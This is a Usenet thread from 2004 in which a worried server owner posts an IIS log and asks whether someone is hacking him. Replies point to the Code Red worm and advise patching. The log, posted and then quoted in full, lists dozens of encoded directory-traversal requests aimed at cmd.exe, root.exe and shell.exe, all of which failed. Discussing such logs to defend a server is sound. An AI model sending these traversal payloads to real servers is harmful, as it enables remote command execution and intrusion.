OT: Have I got a hacker?

Hello All, I recently set up a webserver using IIS in Windows Xp. I
noticed the following data in the log tonight, and wonder if anyone could
possibly tell me what it means. Everything else in the log appears to be
just general page access, but this looks a bit dodgy to me, as I don't
recognise what it means. Is someone trying to hack into my server? I have
replaced the originating IP address in this log with xxx.xx.xxx.xx.

16:59:20 xxx.xx.xxx.xx GET /..%5c..%5cwinnt/system32/cmd.exe 404
16:59:24 xxx.xx.xxx.xx GET /winnt/system32/cmd.exe 404
16:59:24 xxx.xx.xxx.xx GET
/_vti_bin/.%2e/.%2e/.%2e/.%2e/winnt/system32/cmd.exe 404
16:59:26 xxx.xx.xxx.xx GET
/_vti_bin/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe 404
16:59:26 xxx.xx.xxx.xx GET
/_vti_bin/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe 404
16:59:28 xxx.xx.xxx.xx GET
/_vti_bin/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe 404
16:59:28 xxx.xx.xxx.xx GET
/_vti_bin/..%5c..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe 404
16:59:30 xxx.xx.xxx.xx GET
/_vti_bin/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe 404
16:59:30 xxx.xx.xxx.xx GET /winnt/system32/cmd.exe 404
16:59:32 xxx.xx.xxx.xx GET /winnt/system32/cmd.exe 404
16:59:32 xxx.xx.xxx.xx GET
/_vti_cnf/..%5c..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe 404
16:59:33 xxx.xx.xxx.xx GET /winnt/system32/cmd.exe 404
16:59:37 xxx.xx.xxx.xx GET
/adsamples/..%5c..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe 404
16:59:37 xxx.xx.xxx.xx GET /winnt/system32/cmd.exe 404
16:59:39 xxx.xx.xxx.xx GET
/cgi-bin/..%5c..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe 404
16:59:40 xxx.xx.xxx.xx GET /winnt/system32/cmd.exe 404
16:59:40 xxx.xx.xxx.xx GET
/iisadmpwd/..%2f..%2f..%2f..%2f..%2f..%2fwinnt/system32/cmd.exe 404
16:59:41 xxx.xx.xxx.xx GET
/iisadmpwd/..%5c..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe 404
16:59:42 xxx.xx.xxx.xx GET /winnt/system32/cmd.exe 404
16:59:42 xxx.xx.xxx.xx GET /winnt/system32/cmd.exe 404
16:59:44 xxx.xx.xxx.xx GET /msadc/.%2e/.%2e/.%2e/.%2e/winnt/system32/cmd.exe
404
16:59:44 xxx.xx.xxx.xx GET /MSADC/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe
404
16:59:46 xxx.xx.xxx.xx GET
/msadc/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 404
16:59:46 xxx.xx.xxx.xx GET /MSADC/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe
404
16:59:48 xxx.xx.xxx.xx GET
/msadc/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 404
16:59:48 xxx.xx.xxx.xx GET /msadc/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe
404
16:59:50 xxx.xx.xxx.xx GET
/msadc/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 404
16:59:50 xxx.xx.xxx.xx GET /msadc/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe
404
16:59:51 xxx.xx.xxx.xx GET
/msadc/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 404
16:59:51 xxx.xx.xxx.xx GET /winnt/system32/cmd.exe 404
16:59:53 xxx.xx.xxx.xx GET /winnt/system32/cmd.exe 404
16:59:53 xxx.xx.xxx.xx GET /à/?/à/?/à/?/¯../winnt/system32/cmd.exe/ 404
16:59:55 xxx.xx.xxx.xx GET /msdac/root.exe 404
16:59:55 xxx.xx.xxx.xx GET /msdac/shell.exe 404
16:59:57 xxx.xx.xxx.xx GET /PBServer/..%5c..%5c..%5cwinnt/system32/cmd.exe
404
16:59:57 xxx.xx.xxx.xx GET /PBServer/..%5c..%5c..%5cwinnt/system32/cmd.exe
404
16:59:59 xxx.xx.xxx.xx GET /PBServer/..%5c..%5c..%5cwinnt/system32/cmd.exe
404
16:59:59 xxx.xx.xxx.xx GET /PBServer/..%5c..%5c..%5cwinnt/system32/cmd.exe
404
17:00:01 xxx.xx.xxx.xx GET /Rpc/..%5c..%5c..%5cwinnt/system32/cmd.exe 404
17:00:01 xxx.xx.xxx.xx GET /Rpc/..%5c..%5c..%5cwinnt/system32/cmd.exe 404
17:00:03 xxx.xx.xxx.xx GET /Rpc/..%5c..%5c..%5cwinnt/system32/cmd.exe 404
17:00:03 xxx.xx.xxx.xx GET /Rpc/..%5c..%5c..%5cwinnt/system32/cmd.exe 404
17:00:04 xxx.xx.xxx.xx GET
/samples/..%5c..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe 404
17:00:04 xxx.xx.xxx.xx GET /winnt/system32/cmd.exe 404
17:00:06 xxx.xx.xxx.xx GET /winnt/system32/cmd.exe 404
17:00:06 xxx.xx.xxx.xx GET /scripts/.%2e/.%2e/winnt/system32/cmd.exe 404
17:00:08 xxx.xx.xxx.xx GET
/scripts/..%2f..%2f..%2f..%2fwinnt/system32/cmd.exe 404
17:00:08 xxx.xx.xxx.xx GET /scripts/..%5c..%5cwinnt/system32/cmd.exe 404
17:00:13 xxx.xx.xxx.xx GET /scripts/..À%9v../winnt/system32/cmd.exe 404
17:00:13 xxx.xx.xxx.xx GET /winnt/system32/cmd.exe 404
17:00:14 xxx.xx.xxx.xx GET /winnt/system32/cmd.exe 404
17:00:14 xxx.xx.xxx.xx GET /scripts/..À%qf../winnt/system32/cmd.exe 404
17:00:16 xxx.xx.xxx.xx GET /scripts/..Á..Á..Á..Áwinnt/system32/cmd.exe
404
17:00:16 xxx.xx.xxx.xx GET /scripts/..Á../winnt/system32/cmd.exe 404
17:00:18 xxx.xx.xxx.xx GET /scripts/..Á%8s../winnt/system32/cmd.exe 404
17:00:18 xxx.xx.xxx.xx GET /winnt/system32/cmd.exe 404
17:00:20 xxx.xx.xxx.xx GET /winnt/system32/cmd.exe 404
17:00:20 xxx.xx.xxx.xx GET /scripts/..o../winnt/system32/cmd.exe 404
17:00:22 xxx.xx.xxx.xx GET /scripts/..Á%pc../winnt/system32/cmd.exe 404
17:00:22 xxx.xx.xxx.xx GET /winnt/system32/cmd.exe 404
17:00:23 xxx.xx.xxx.xx GET /scripts/..ð??¯../winnt/system32/cmd.exe 404
17:00:23 xxx.xx.xxx.xx GET /scripts/..ø???¯../winnt/system32/cmd.exe 404
17:00:25 xxx.xx.xxx.xx GET /scripts/..ü????¯../winnt/system32/cmd.exe 404
17:00:25 xxx.xx.xxx.xx GET /scripts/root.exe 404
17:00:27 xxx.xx.xxx.xx GET /scripts/shell.exe 404

Thanks Ray (worried) : - (

On Sun, 29 Aug 2004 02:49:57 +0100, "Ray" <(E-Mail Removed)>
wrote:

>Hello All, I recently set up a webserver using IIS in Windows Xp.

....

>16:59:20 xxx.xx.xxx.xx GET /..%5c..%5cwinnt/system32/cmd.exe 404

Look up the code red worm.

I believe that the version of IIS that ships with Windows XP is not
vulnerable to this worm; however, since this is Usenet, that advice is
worth *exactly* what you paid for it and you should read up on methods
of securing IIS, and make sure that you are up to date on the various
hotfixes for both XP and IIS.

Derek
--
Q: How many surrealists does it take to screw in a lightbulb?
A: Two. One to hold the giraffe and the other to fill the bathtub
with brightly-colored machine tools.

Thats a method of running processes on a remote host using IIS5 (i think
5, the one that comes with Win2K) we used to try it at school.
Its a bug in IIS that is exploited.
G


"Ray" <(E-Mail Removed)> wrote in message
news:(E-Mail Removed)...
> Hello All, I recently set up a webserver using IIS in Windows Xp. I
> noticed the following data in the log tonight, and wonder if anyone
> could possibly tell me what it means. Everything else in the log
> appears to be just general page access, but this looks a bit dodgy to
> me, as I don't recognise what it means. Is someone trying to hack
> into my server? I have replaced the originating IP address in this
> log with xxx.xx.xxx.xx.
>
> 16:59:20 xxx.xx.xxx.xx GET /..%5c..%5cwinnt/system32/cmd.exe 404
> 16:59:24 xxx.xx.xxx.xx GET /winnt/system32/cmd.exe 404
> 16:59:24 xxx.xx.xxx.xx GET
> /_vti_bin/.%2e/.%2e/.%2e/.%2e/winnt/system32/cmd.exe 404
> 16:59:26 xxx.xx.xxx.xx GET
> /_vti_bin/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe 404
> 16:59:26 xxx.xx.xxx.xx GET
> /_vti_bin/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe 404
> 16:59:28 xxx.xx.xxx.xx GET
> /_vti_bin/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe 404
> 16:59:28 xxx.xx.xxx.xx GET
> /_vti_bin/..%5c..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe 404
> 16:59:30 xxx.xx.xxx.xx GET
> /_vti_bin/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe 404
> 16:59:30 xxx.xx.xxx.xx GET /winnt/system32/cmd.exe 404
> 16:59:32 xxx.xx.xxx.xx GET /winnt/system32/cmd.exe 404
> 16:59:32 xxx.xx.xxx.xx GET
> /_vti_cnf/..%5c..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe 404
> 16:59:33 xxx.xx.xxx.xx GET /winnt/system32/cmd.exe 404
> 16:59:37 xxx.xx.xxx.xx GET
> /adsamples/..%5c..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe 404
> 16:59:37 xxx.xx.xxx.xx GET /winnt/system32/cmd.exe 404
> 16:59:39 xxx.xx.xxx.xx GET
> /cgi-bin/..%5c..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe 404
> 16:59:40 xxx.xx.xxx.xx GET /winnt/system32/cmd.exe 404
> 16:59:40 xxx.xx.xxx.xx GET
> /iisadmpwd/..%2f..%2f..%2f..%2f..%2f..%2fwinnt/system32/cmd.exe 404
> 16:59:41 xxx.xx.xxx.xx GET
> /iisadmpwd/..%5c..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe 404
> 16:59:42 xxx.xx.xxx.xx GET /winnt/system32/cmd.exe 404
> 16:59:42 xxx.xx.xxx.xx GET /winnt/system32/cmd.exe 404
> 16:59:44 xxx.xx.xxx.xx GET
> /msadc/.%2e/.%2e/.%2e/.%2e/winnt/system32/cmd.exe 404
> 16:59:44 xxx.xx.xxx.xx GET
> /MSADC/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe 404
> 16:59:46 xxx.xx.xxx.xx GET
> /msadc/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 404
> 16:59:46 xxx.xx.xxx.xx GET
> /MSADC/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe 404
> 16:59:48 xxx.xx.xxx.xx GET
> /msadc/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 404
> 16:59:48 xxx.xx.xxx.xx GET
> /msadc/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe 404
> 16:59:50 xxx.xx.xxx.xx GET
> /msadc/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 404
> 16:59:50 xxx.xx.xxx.xx GET
> /msadc/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe 404
> 16:59:51 xxx.xx.xxx.xx GET
> /msadc/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 404
> 16:59:51 xxx.xx.xxx.xx GET /winnt/system32/cmd.exe 404
> 16:59:53 xxx.xx.xxx.xx GET /winnt/system32/cmd.exe 404
> 16:59:53 xxx.xx.xxx.xx GET /à/?/à/?/à/?/¯../winnt/system32/cmd.exe/
> 404
> 16:59:55 xxx.xx.xxx.xx GET /msdac/root.exe 404
> 16:59:55 xxx.xx.xxx.xx GET /msdac/shell.exe 404
> 16:59:57 xxx.xx.xxx.xx GET
> /PBServer/..%5c..%5c..%5cwinnt/system32/cmd.exe 404
> 16:59:57 xxx.xx.xxx.xx GET
> /PBServer/..%5c..%5c..%5cwinnt/system32/cmd.exe 404
> 16:59:59 xxx.xx.xxx.xx GET
> /PBServer/..%5c..%5c..%5cwinnt/system32/cmd.exe 404
> 16:59:59 xxx.xx.xxx.xx GET
> /PBServer/..%5c..%5c..%5cwinnt/system32/cmd.exe 404
> 17:00:01 xxx.xx.xxx.xx GET /Rpc/..%5c..%5c..%5cwinnt/system32/cmd.exe
> 404
> 17:00:01 xxx.xx.xxx.xx GET /Rpc/..%5c..%5c..%5cwinnt/system32/cmd.exe
> 404
> 17:00:03 xxx.xx.xxx.xx GET /Rpc/..%5c..%5c..%5cwinnt/system32/cmd.exe
> 404
> 17:00:03 xxx.xx.xxx.xx GET /Rpc/..%5c..%5c..%5cwinnt/system32/cmd.exe
> 404
> 17:00:04 xxx.xx.xxx.xx GET
> /samples/..%5c..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe 404
> 17:00:04 xxx.xx.xxx.xx GET /winnt/system32/cmd.exe 404
> 17:00:06 xxx.xx.xxx.xx GET /winnt/system32/cmd.exe 404
> 17:00:06 xxx.xx.xxx.xx GET /scripts/.%2e/.%2e/winnt/system32/cmd.exe
> 404
> 17:00:08 xxx.xx.xxx.xx GET
> /scripts/..%2f..%2f..%2f..%2fwinnt/system32/cmd.exe 404
> 17:00:08 xxx.xx.xxx.xx GET /scripts/..%5c..%5cwinnt/system32/cmd.exe
> 404
> 17:00:13 xxx.xx.xxx.xx GET /scripts/..À%9v../winnt/system32/cmd.exe
> 404
> 17:00:13 xxx.xx.xxx.xx GET /winnt/system32/cmd.exe 404
> 17:00:14 xxx.xx.xxx.xx GET /winnt/system32/cmd.exe 404
> 17:00:14 xxx.xx.xxx.xx GET /scripts/..À%qf../winnt/system32/cmd.exe
> 404
> 17:00:16 xxx.xx.xxx.xx GET
> /scripts/..Á..Á..Á..Áwinnt/system32/cmd.exe 404
> 17:00:16 xxx.xx.xxx.xx GET /scripts/..Á../winnt/system32/cmd.exe 404
> 17:00:18 xxx.xx.xxx.xx GET /scripts/..Á%8s../winnt/system32/cmd.exe
> 404
> 17:00:18 xxx.xx.xxx.xx GET /winnt/system32/cmd.exe 404
> 17:00:20 xxx.xx.xxx.xx GET /winnt/system32/cmd.exe 404
> 17:00:20 xxx.xx.xxx.xx GET /scripts/..o../winnt/system32/cmd.exe 404
> 17:00:22 xxx.xx.xxx.xx GET /scripts/..Á%pc../winnt/system32/cmd.exe
> 404
> 17:00:22 xxx.xx.xxx.xx GET /winnt/system32/cmd.exe 404
> 17:00:23 xxx.xx.xxx.xx GET /scripts/..ð??¯../winnt/system32/cmd.exe
> 404
> 17:00:23 xxx.xx.xxx.xx GET /scripts/..ø???¯../winnt/system32/cmd.exe
> 404
> 17:00:25 xxx.xx.xxx.xx GET /scripts/..ü????¯../winnt/system32/cmd.exe
> 404
> 17:00:25 xxx.xx.xxx.xx GET /scripts/root.exe 404
> 17:00:27 xxx.xx.xxx.xx GET /scripts/shell.exe 404
>
> Thanks Ray (worried) : - (
>
>
>
>
>